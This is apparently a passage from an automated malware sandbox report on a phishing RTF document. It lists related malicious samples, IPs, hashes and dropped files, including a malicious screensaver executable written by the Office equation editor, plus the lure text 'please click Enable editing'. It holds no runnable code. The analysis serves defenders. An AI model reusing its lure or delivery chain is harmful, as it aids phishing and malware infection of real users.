            ITEMS.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
            • 45.33.6.223
            vm6XYZzWOd.exeGet hashmaliciousPureLog Stealer, SystemBCBrowse
            • 45.33.20.235
            AS-26496-GO-DADDY-COM-LLCUSv5GNrLZP9g.elfGet hashmaliciousMiraiBrowse
            • 160.153.92.164
            Remittance Advice.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
            • 148.66.136.151
            https://apollosonline.com/verified-sender.htmlGet hashmaliciousHTMLPhisherBrowse
            • 198.12.236.207
            https://36.54.167.72.host.secureserver.net/Tributaria/?Folio=ventanillaunica@sat.gob.mxGet hashmaliciousUnknownBrowse
            • 72.167.54.36
            SecuriteInfo.com.Win32.PWSX-gen.3657.16298.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
            • 148.66.136.151
            https://kids-copybooks.us17.list-manage.com/track/click?u=5a97ab8972763fb865eff2c7b&id=17a683593e&e=91ca37f411Get hashmaliciousUnknownBrowse
            • 184.168.146.156
            BANK SWIFT.pdf_________________________________________________________________________.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
            • 68.178.145.49
            r30%Downpayment.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
            • 68.178.145.49
            opszx.scr.exeGet hashmaliciousFormBookBrowse
            • 198.12.241.35
            http://121.233.109.208.host.secureserver.net/34818248/8397605615Get hashmaliciousUnknownBrowse
            • 208.109.233.121

            JA3 Fingerprints

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            6b0dc43f177fcd6d2946d55121243d1bPURCHASE ORDER_REQUEST.xla.xlsxGet hashmaliciousUnknownBrowse
            • 104.21.74.191
            PDFCreator-5_1_2-Setup.exeGet hashmaliciousUnknownBrowse
            • 104.21.74.191
            Rechnungszahlung.xlsGet hashmaliciousHidden Macro 4.0, EmotetBrowse
            • 104.21.74.191
            case (2553).xlsGet hashmaliciousUnknownBrowse
            • 104.21.74.191

            Dropped Files

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            C:\Users\user\AppData\Local\Temp\sqlite3.dllF9DB076BD8F99C606CDAE2D6EB5F4EC112A705CF28513.exeGet hashmaliciousPetite Virus, PureLog Stealer, Raccoon Stealer v2Browse
              xPqfO9S4OX.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                ANY0GXX69f.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                  XkcTT1Rdow.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                    p95oYhg20N.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                      Lwpqjy7Pvm.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                        U3hMKK4NnP.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                          sjvRXEMjOO.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                            916ce2nhHG.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                              g1sXTyvXiR.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse

                                Created / dropped Files

                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\loudzx[1].scr

                                Download File
                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):1273344
                                Entropy (8bit):6.998944839494362
                                Encrypted:false
                                SSDEEP:12288:JSu1SlCLvMZmeIlVOoLrIivhk9dqxCygRuJi2pkU5BD8db8FO/f/8RVad7WTpnbK:JSu1S82mBVrIiudqHsLBj8RCqiAAS7C
                                MD5:ED7336086B1E5267C0D4863325956BE2
                                SHA1:873B53CB68255E8A4F1AF53C0682C14E31FF530D
                                SHA-256:598C9EE3A50B02B46197C90C5B4B01542225DD6A38059B32E326930A2798C496
                                SHA-512:6FD10E951C207A1A9A54F6F24A570F2C1C232EAD3D5C08A5A506CB934C8D3758EF9701FAA2D6B425B5D34A2DB20605344A98D15C91203BE4DBB6DA7AD5521E5E
                                Malicious:true
                                Antivirus:
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: ReversingLabs, Detection: 16%
                                Reputation:low
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...2>+..........."...0..b..........>.... ........@.. ....................................`....................................W.......:............................................................................ ............... ..H............text...Da... ...b.................. ..`.rsrc...:............d..............@..@.reloc...............l..............@..B................ .......H.......`...............hm...v..........................................b...............%...$...&.......o...............................^...o...........b.......S.......5..."...............................................................................................................................................^...o...................................^...o...........<...[...y.......................1...O...n...................................................................

                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\sqlite-dll-win32-x86-3210000[1].zip

                                Download File
                                Process:C:\Windows\SysWOW64\dfrgui.exe
                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                Category:dropped
                                Size (bytes):446183
                                Entropy (8bit):7.998782571983681
                                Encrypted:true
                                SSDEEP:6144:mrysnGZ0I/RI2TOHAYJRegqc1KNZZ1jyxFyfFemMiId1LPhqW8UdaFEByP4FVeK:mm+4ZI2Kgk3ID1Ujxd1rhtsFEggDeK
                                MD5:C42EC8F35C6A06666E6AD54471A2728B
                                SHA1:C3CC57A816927FA616616939B4B7A63C2322CFA1
                                SHA-256:22BB304AAB3EC7A51FC4DC7749F304BBE01C5EC014144FBC8F86012DC3B0708B
                                SHA-512:6FE9A3C3F861663B6408FD5136D202835A89344072996DD65DDA14FA04707662A26D0C6ED482FD0606A270943112D9EFFC07424AF90621094F6FBB88C8FF7EAE
                                Malicious:false
                                Reputation:low
                                Preview:PK..........YK..A.............sqlite3.defUT...L..YL..Yux.........d.......(...y.d....r.Tv.{sa,......=3O.......>..B............*..$...&.L....T...1..?..5.<....iUF.KO....b.>sU8...0[.....Y.Y.y$..p..8k.L.u+...5'.pb....I.D..)...t....!;....:....[....}u.t....#..Hj.#{...Xz2~us..C..L.a.M..`P;..| .......96b.. \.&...t.Y.....Z...N.`......nx(..s$..x.P..".Y..,h...H.>.qX.'#x.T.F.x.Txf.e.M.. .q.nW...iNF.D"....o.d.v.U...Qv(....c..D.=.....`..*......i.k.4.&^..5F.*..eA.....|..9.l.K.M..~............fI.;...f.1:....).K)\.....`r.[.4>..[Z.|..7.A..hE.Hm.rR..._p.R6.t.I.0y.['..#.Nx.I..7.K .P9......]..G...l.N..1.&...>......T} L.\.Kbu.=..c.`,.B.y.^.........G[A...{par...?..q6v^.aO..d-...O.[.v~....N$...$0...^.v...)T.+-..p.k.=.D...3"3`=Ha......,..1.F..7... .$z.H..z.c."k..9g'...p.-..2Y.A.z.....;..M9@el............~.U&q.........f-.K.cke.]..b.Xw..o).X.a.cq;.`.Ljy.....t.W.w...8.{.b.%.6n...t........R.WT8........E..q!......x...:...g..K...>...I-N.y.....{k..5...7]..v.......{....

                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{0C4DC952-54A3-4600-8ADF-E33FC95BF851}.tmp

                                Download File
                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                File Type:data
                                Category:dropped
                                Size (bytes):16384
                                Entropy (8bit):0.0
                                Encrypted:false
                                SSDEEP:3::
                                MD5:CE338FE6899778AACFC28414F2D9498B
                                SHA1:897256B6709E1A4DA9DABA92B6BDE39CCFCCD8C1
                                SHA-256:4FE7B59AF6DE3B665B67788CC2F99892AB827EFAE3A467342B3BB4E3BC8E5BFE
                                SHA-512:6EB7F16CF7AFCABE9BDEA88BDAB0469A7937EB715ADA9DFD8F428D9D38D86133945F5F2F2688DDD96062223A39B5D47F07AFC3C48D9DB1D5EE3F41C8D274DCCF
                                Malicious:false
                                Reputation:high, very likely benign file
                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4009DDD1-DB1C-41CE-A293-A5E46E715DCE}.tmp

                                Download File
                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                File Type:data
                                Category:dropped
                                Size (bytes):1536
                                Entropy (8bit):1.3586208805849453
                                Encrypted:false
                                SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbO:IiiiiiiiiifdLloZQc8++lsJe1MzJn
                                MD5:7CE7D5599215ABDE85A649E974C7FBC1
                                SHA1:40E6C71933CF177328D69453D54139319E2E54E8
                                SHA-256:3F84EDCFED8F306D93910370374FB2D7D9BE669E6665262481E052AD84E0284E
                                SHA-512:9C99FD0AA8ACDD6615289406906D754963B747DD850EDD7EB0E72B473D8C1308A60C82ED75AEAE0E2914E43C5A068B2ED209D0B2C986894148B9311C84AB45B5
                                Malicious:false
                                Preview:..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{48E7344B-2A3F-40E3-AC6B-5E4E921F9721}.tmp

                                Download File
                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                File Type:data
                                Category:dropped
                                Size (bytes):1024
                                Entropy (8bit):0.05390218305374581
                                Encrypted:false
                                SSDEEP:3:ol3lYdn:4Wn
                                MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                Malicious:false
                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{981FE0D2-48D8-4361-916E-6E4409D92C4F}.tmp

                                Download File
                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                File Type:data
                                Category:dropped
                                Size (bytes):96256
                                Entropy (8bit):3.566373636331511
                                Encrypted:false
                                SSDEEP:768:zgI2Q5Q6IQXwvW5Kq2g05gI2Q5Q6IQXwvW5Kq2g05gI2Q5Q6IQXwvW5Kq2g05gIv:YSyemuSyemuSyemuSyemuSyem7hc2PTF
                                MD5:F8B41099C1DE7E7B6E71EEFC11566EDE
                                SHA1:8E3127088A057285B17635311FC040621477DD95
                                SHA-256:19128DE729852483DD9901EF01F47553D8D350CC8EADF6E85C575229D56C1B18
                                SHA-512:25F544A2974D81F69FB8BBE891BD5BBDF7E05DCC5DC93F587C2F086262902B7D1C13250F778A4DB654FA56C2B18F584D2ED7441B323EC84A42B16449ECC8A177
                                Malicious:false
                                Preview:1.4.4.7.9.2.1.5.p.l.e.a.s.e. .c.l.i.c.k. .E.n.a.b.l.e. .e.d.i.t.i.n.g. .f.r.o.m. .t.h.e. .y.e.l.l.o.w. .b.a.r. .a.b.o.v.e...T.h.e. .i.n.d.e.p.e.n.d.e.n.t. .a.u.d.i.t.o.r.s.. .o.p.i.n.i.o.n. .s.a.y.s. .t.h.e. .f.i.n.a.n.c.i.a.l. .s.t.a.t.e.m.e.n.t.s. .a.r.e. .f.a.i.r.l.y. .s.t.a.t.e.d. .i.n. .a.c.c.o.r.d.a.n.c.e. .w.i.t.h. .t.h.e. .b.a.s.i.s. .o.f. .a.c.c.o.u.n.t.i.n.g. .u.s.e.d. .b.y. .y.o.u.r. .o.r.g.a.n.i.z.a.t.i.o.n... .S.o. .w.h.y. .a.r.e. .t.h.e. .a.u.d.i.t.o.r.s. .g.i.v.i.n.g. .y.o.u. .t.h.a.t. .o.t.h.e.r. .l.e.t.t.e.r. .I.n. .a.n. .a.u.d.i.t. .o.f. .f.i.n.a.n.c.i.a.l. .s.t.a.t.e.m.e.n.t.s.,. .p.r.o.f.e.s.s.i.o.n.a.l. .s.t.a.n.d.a.r.d.s. .r.e.q.u.i.r.e. .t.h.a.t. .a.u.d.i.t.o.r.s. .o.b.t.a.i.n. .a.n. .u.n.d.e.r.s.t.a.n.d.i.n.g. .o.f. .i.n.t.e.r.n.a.l. .c.o.n.t.r.o.l.s. .t.o. .t.h.e. .e.x.t.e.n.t. .n.e.c.e.s.s.a.r.y. .t.o. .p.l.a.n. .t.h.e. .a.u.d.i.t... .A.u.d.i.t.o.r.s. .u.s.e. .t.h.i.s. .u.n.d.e.r.s.t.a.n.d.i.n.g. .o.f. .i.n.t.e.r.n.a.l. .c.o.n.t.r.o.l.s. .t.o. .a.s.s.e.s.s. .

                                C:\Users\user\AppData\Local\Temp\13d6pS3

                                Download File
                                Process:C:\Windows\SysWOW64\dfrgui.exe
                                File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 3, database pages 20, cookie 0x15, schema 4, UTF-8, version-valid-for 3
                                Category:dropped
                                Size (bytes):77824
                                Entropy (8bit):1.0714656887192844
                                Encrypted:false
                                SSDEEP:96:LSe7mlcwilGc7Ha3f+uG01YLvqAogv5KzzUG+Qk/BuqBFzsCWo3qkrH1VumgXn:LscflGwucCaM0f6kL1Vumi
                                MD5:9867F6F82F226DE748557B47C82BE25D
                                SHA1:B10DE25FA81662E082C60C8700E348C19AE7404B
                                SHA-256:CCB153269D92EC65916497E01D0E63A4A61767603EBB226FFD35DCC983B62A55
                                SHA-512:25917CB9C6632DB1F75C80CC6D64077EF742F6A6F2134DAB7D8DEFEB4DA10040A91B98A03560DDBF6A096E2ADC8CF496902E54877665B9E1C5542397C889E214
                                Malicious:false
                                Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Local\Temp\abr0vjm0.zip

                                Download File
                                Process:C:\Windows\SysWOW64\dfrgui.exe
                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                Category:dropped
                                Size (bytes):446183
                                Entropy (8bit):7.998782571983681
                                Encrypted:true
                                SSDEEP:6144:mrysnGZ0I/RI2TOHAYJRegqc1KNZZ1jyxFyfFemMiId1LPhqW8UdaFEByP4FVeK:mm+4ZI2Kgk3ID1Ujxd1rhtsFEggDeK
                                MD5:C42EC8F35C6A06666E6AD54471A2728B
                                SHA1:C3CC57A816927FA616616939B4B7A63C2322CFA1
                                SHA-256:22BB304AAB3EC7A51FC4DC7749F304BBE01C5EC014144FBC8F86012DC3B0708B
                                SHA-512:6FE9A3C3F861663B6408FD5136D202835A89344072996DD65DDA14FA04707662A26D0C6ED482FD0606A270943112D9EFFC07424AF90621094F6FBB88C8FF7EAE
                                Malicious:false
                                Preview:PK..........YK..A.............sqlite3.defUT...L..YL..Yux.........d.......(...y.d....r.Tv.{sa,......=3O.......>..B............*..$...&.L....T...1..?..5.<....iUF.KO....b.>sU8...0[.....Y.Y.y$..p..8k.L.u+...5'.pb....I.D..)...t....!;....:....[....}u.t....#..Hj.#{...Xz2~us..C..L.a.M..`P;..| .......96b.. \.&...t.Y.....Z...N.`......nx(..s$..x.P..".Y..,h...H.>.qX.'#x.T.F.x.Txf.e.M.. .q.nW...iNF.D"....o.d.v.U...Qv(....c..D.=.....`..*......i.k.4.&^..5F.*..eA.....|..9.l.K.M..~............fI.;...f.1:....).K)\.....`r.[.4>..[Z.|..7.A..hE.Hm.rR..._p.R6.t.I.0y.['..#.Nx.I..7.K .P9......]..G...l.N..1.&...>......T} L.\.Kbu.=..c.`,.B.y.^.........G[A...{par...?..q6v^.aO..d-...O.[.v~....N$...$0...^.v...)T.+-..p.k.=.D...3"3`=Ha......,..1.F..7... .$z.H..z.c."k..9g'...p.-..2Y.A.z.....;..M9@el............~.U&q.........f-.K.cke.]..b.Xw..o).X.a.cq;.`.Ljy.....t.W.w...8.{.b.%.6n...t........R.WT8........E..q!......x...:...g..K...>...I-N.y.....{k..5...7]..v.......{....

                                C:\Users\user\AppData\Local\Temp\hrzxgdw.zip

                                Download File
                                Process:C:\Windows\SysWOW64\dfrgui.exe
                                File Type:HTML document, ASCII text
                                Category:dropped
                                Size (bytes):177
                                Entropy (8bit):4.950041292189224
                                Encrypted:false
                                SSDEEP:3:8ROAyR0e0qHXbvx9McfwF0GFS77uR2MBJJULZIlV/4FXFAIuJFXhXWNqL:AeR0eRHXLxytcu1Hlld4zGbeqL
                                MD5:C631DB134F4EF9BFCEE837A10FD0224C
                                SHA1:6C9DAD1A2E80EA650C7E96FD8074DDF9E6EE54F6
                                SHA-256:1A3BE7D5762AD52C9D0AA21E4A48FF3CAE363ECF59CC51E45E4E8229D3E41006
                                SHA-512:12520242F0D5EF414A17DF9800DBA6AA0604E702C1BBC67F75572191FAC0021D1BE25FD0FC33E0F4AF1EC0A1F4D0A38F62EBE5CF8E25AD647143B75DD4689DAA
                                Malicious:false
                                Preview:<head><title lineno="380">Not Found</title></head>.<body><h1>Document Not Found</h1>.The document /2021/sqlite-dll-win32-x86-3340000.zip is not available on this server.</body>.

                                C:\Users\user\AppData\Local\Temp\sqlite3.def

                                Download File
                                Process:C:\Windows\SysWOW64\dfrgui.exe
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):5099
                                Entropy (8bit):4.34628563675731
                                Encrypted:false
                                SSDEEP:96:GcuN/gR+7Oc0XRMcCM3KOGOF++BlMtvr9NHY0ac:E/Q+7Oc0JKOBF++Evr9NHcc
                                MD5:248209B7183B5D5B667DFD77EE847763
                                SHA1:69B2CA31C9656E2B9BBB5A04CDB61047BED37F50
                                SHA-256:9FB7168694EBFA19383DE44AC8AA1B5341DEA5FC228DC7CCE8008C643807FDCE
                                SHA-512:108963CAFD9BC58FE0ACFB0A74D499549C275C523CB3E29ED4FA762DE0EBF9985B94AF414E29755808C5A19EBDDAA943B9DE8F68F7BD490145CE68DC6CCB7067
                                Malicious:false
                                Preview:EXPORTS.sqlite3_aggregate_context.sqlite3_aggregate_count.sqlite3_auto_extension.sqlite3_backup_finish.sqlite3_backup_init.sqlite3_backup_pagecount.sqlite3_backup_remaining.sqlite3_backup_step.sqlite3_bind_blob.sqlite3_bind_blob64.sqlite3_bind_double.sqlite3_bind_int.sqlite3_bind_int64.sqlite3_bind_null.sqlite3_bind_parameter_count.sqlite3_bind_parameter_index.sqlite3_bind_parameter_name.sqlite3_bind_pointer.sqlite3_bind_text.sqlite3_bind_text16.sqlite3_bind_text64.sqlite3_bind_value.sqlite3_bind_zeroblob.sqlite3_bind_zeroblob64.sqlite3_blob_bytes.sqlite3_blob_close.sqlite3_blob_open.sqlite3_blob_read.sqlite3_blob_reopen.sqlite3_blob_write.sqlite3_busy_handler.sqlite3_busy_timeout.sqlite3_cancel_auto_extension.sqlite3_changes.sqlite3_clear_bindings.sqlite3_close.sqlite3_close_v2.sqlite3_collation_needed.sqlite3_collation_needed16.sqlite3_column_blob.sqlite3_column_bytes.sqlite3_column_bytes16.sqlite3_column_count.sqlite3_column_database_name.sqlite3_column_database_name16.sqlite3_colum

                                C:\Users\user\AppData\Local\Temp\sqlite3.dll

                                Download File
                                Process:C:\Windows\SysWOW64\dfrgui.exe
                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):852754
                                Entropy (8bit):6.503318968423685
                                Encrypted:false
                                SSDEEP:12288:fpFFQV+FKJ37Dm+yY4pBkPr2v2meLaoHN/oBrZ3ixdnGVzpJXm/iN:fpnzFw37iDYIBkzuPcHNgrZ3uGVzm/iN
                                MD5:07FB6D31F37FB1B4164BEF301306C288
                                SHA1:4CB41AF6D63A07324EF6B18B1A1F43CE94E25626
                                SHA-256:06DDF0A370AF00D994824605A8E1307BA138F89B2D864539F0D19E8804EDAC02
                                SHA-512:CAB4A7C5805B80851ABA5F2C9B001FABC1416F6648D891F49EACC81FE79287C5BAA01306A42298DA722750B812A4EA85388FFAE9200DCF656DD1D5B5B9323353
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Joe Sandbox View:
                                • Filename: F9DB076BD8F99C606CDAE2D6EB5F4EC112A705CF28513.exe, Detection: malicious, Browse
                                • Filename: xPqfO9S4OX.exe, Detection: malicious, Browse
                                • Filename: ANY0GXX69f.exe, Detection: malicious, Browse
                                • Filename: XkcTT1Rdow.exe, Detection: malicious, Browse
                                • Filename: p95oYhg20N.exe, Detection: malicious, Browse
                                • Filename: Lwpqjy7Pvm.exe, Detection: malicious, Browse
                                • Filename: U3hMKK4NnP.exe, Detection: malicious, Browse
                                • Filename: sjvRXEMjOO.exe, Detection: malicious, Browse
                                • Filename: 916ce2nhHG.exe, Detection: malicious, Browse
                                • Filename: g1sXTyvXiR.exe, Detection: malicious, Browse
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...L..Y.,..v......!......... .....................a................................O}........ ......................................@.......................P..X0...........................0.......................................................text...............................`.P`.data...............................@.`..rdata..............................@.`@.bss..................................`..edata..............................@.0@.idata..............................@.0..CRT....,.... ......................@.0..tls.... ....0......................@.0..rsrc........@......................@.0..reloc..X0...P...2..................@.0B/4...................&..............@.@B/19.................*..............@..B/31..........@......................@..B/45..........`......................@..B/57.................................@.0B/70.....i...............

                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Doc PI.LNK

                                Download File
                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:06 2023, mtime=Fri Aug 11 15:42:06 2023, atime=Mon May 20 05:53:33 2024, length=145966, window=hide
                                Category:dropped
                                Size (bytes):992
                                Entropy (8bit):4.508300921847653
                                Encrypted:false
                                SSDEEP:12:8E2HI0gXg/XAlCPCHaXeBhB/BGFX+WiSUPoNVZEicvb+n7RZ+DtZ3YilMMEpxRlq:8EVk/XTOjbkZ+QZveQZ+Dv3qFMqk7N
                                MD5:A819A559C4C08662A02B467079509621
                                SHA1:2C559AEFA538BDC10AE3097077367E39283F5C8C
                                SHA-256:D9B2E9FCB9583C786649BAEBF3B5EC5FDF0CC40C62B0CC162A1EA58F026B81E5
                                SHA-512:719D9B72BACA6754C5E701410BC0867DE677AAF1DBCC039EB6E510E8ADBA89723F6B9EC15C7EE6CA16ACD8D17EA5BF993B613634779FC45879548467E136760E
                                Malicious:false
                                Preview:L..................F.... .......r.......r....p"n.....:...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......X.6..user.8......QK.X.X.6*...&=....U...............A.l.b.u.s.....z.1......WE...Desktop.d......QK.X.WE.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....\.2..:...X.6 .DOCPI~1.DOC.B.......WD..WD.*.........................D.o.c. .P.I...d.o.c.......t...............-...8...[............?J......C:\Users\..#...................\\618321\Users.user\Desktop\Doc PI.doc.!.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.D.o.c. .P.I...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......618321..........D_....3N...W...9.W.e8...8.....[D_....3N...W...9.W.e8...8.....[....

                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

                                Download File
                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                File Type:Generic INItialization configuration [folders]
                                Category:dropped
                                Size (bytes):46
                                Entropy (8bit):4.333238314705634
                                Encrypted:false
                                SSDEEP:3:M1cGF1sLpzCm4US1sLpzCv:MeGPSzhGSzs
                                MD5:9DC6125FFC7D8B4503A531CC61220C40
                                SHA1:22124009E945FD72804BFE16FD8DB42EDA39D5BE
                                SHA-256:359A0CEF804F64069EAD7F756723C64D06A1968879A412FA12F9136AFC6483D9
                                SHA-512:4FEF5AC0734278B6290896DBB35841D46C3750961E9590FD045F2594CD1EED3B2889A88D62273E2322F14C9B71F98116AAE9FCFA73067DAE19A6BBD098998858
                                Malicious:false
                                Preview:[doc]..Doc PI.LNK=0..[folders]..Doc PI.LNK=0..

                                C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

                                Download File
                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                File Type:data
                                Category:dropped
                                Size (bytes):162
                                Entropy (8bit):2.4797606462020307
                                Encrypted:false
                                SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
                                MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
                                SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
                                SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
                                SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
                                Malicious:false
                                Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                C:\Users\user\AppData\Roaming\loud89334.scr

                                Download File
                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):1273344
                                Entropy (8bit):6.998944839494362
                                Encrypted:false
                                SSDEEP:12288:JSu1SlCLvMZmeIlVOoLrIivhk9dqxCygRuJi2pkU5BD8db8FO/f/8RVad7WTpnbK:JSu1S82mBVrIiudqHsLBj8RCqiAAS7C
                                MD5:ED7336086B1E5267C0D4863325956BE2
                                SHA1:873B53CB68255E8A4F1AF53C0682C14E31FF530D
                                SHA-256:598C9EE3A50B02B46197C90C5B4B01542225DD6A38059B32E326930A2798C496
                                SHA-512:6FD10E951C207A1A9A54F6F24A570F2C1C232EAD3D5C08A5A506CB934C8D3758EF9701FAA2D6B425B5D34A2DB20605344A98D15C91203BE4DBB6DA7AD5521E5E
                                Malicious:true
                                Antivirus:
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: ReversingLabs, Detection: 16%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...2>+..........."...0..b..........>.... ........@.. ....................................`....................................W.......:............................................................................ ............... ..H............text...Da... ...b.................. ..`.rsrc...:............d..............@..@.reloc...............l..............@..B................ .......H.......`...............hm...v..........................................b...............%...$...&.......o...............................^...o...........b.......S.......5..."...............................................................................................................................................^...o...................................^...o...........<...[...y.......................1...O...n...................................................................

                                C:\Users\user\Desktop\~$Doc PI.doc

                                Download File
                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                File Type:data
                                Category:dropped
                                Size (bytes):162
                                Entropy (8bit):2.4797606462020307
                                Encrypted:false
                                SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
                                MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
                                SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
                                SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
                                SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
                                Malicious:false
                                Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                Static File Info

                                General

                                File type:Rich Text Format data, version 1
                                Entropy (8bit):3.9364830841211114
                                TrID:
                                • Rich Text Format (5005/1) 55.56%
                                • Rich Text Format (4004/1) 44.44%
                                File name:Doc PI.doc
                                File size:145'966 bytes
                                MD5:05296d88142eb2e6929ab8f1f5131e18
                                SHA1:c242cc72aeb237706ac7a8af3f250d6772091589
                                SHA256:7d4ab5a581de7b1243a23c4383bb962d530bfc85c67f48e094b82301d1ff0654
                                SHA512:aaed33cdabed15bd7ac197f2159473cd7cb7d704eecc6dcb18ed68ac46ad7bc3a847bea1df14352aaf393c3a69152586bf3fe8a87955123d84260a3dd210d9c9
                                SSDEEP:3072:MwAlawAlawAlawAlawAlVcJmiHRodvH0bsm:MwAYwAYwAYwAYwAkJmaoV04m
                                TLSH:4BE3166DD34B02598F620337AB571E5142BDBA7EF38452B1306C537933EAC39A1252BE
                                File Content Preview:{\rtf1..{\*\ipxcBqu3N61MhbIR09P1lgd5VuujWE48rqZpUBCCjWEJ2qgrt3yS0Jg9nheB33M1yCOcGJPvfT4cbhWEDwqFRdwmb9dE0ruMxCbXwz9E4FionvSYq6AvTO61qZyQmSNCj5L6v279s8IO0K8tjn70VOmtPEpImcQYBAlqcCwjxOy}..{\514479215please click Enable editing from the yellow bar above.The

                                File Icon

                                Icon Hash:2764a3aaaeb7bdbf

                                Static RTF Info

                                Objects

                                IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                00000B98Fhno

                                Network Behavior

                                Snort IDS Alerts

                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
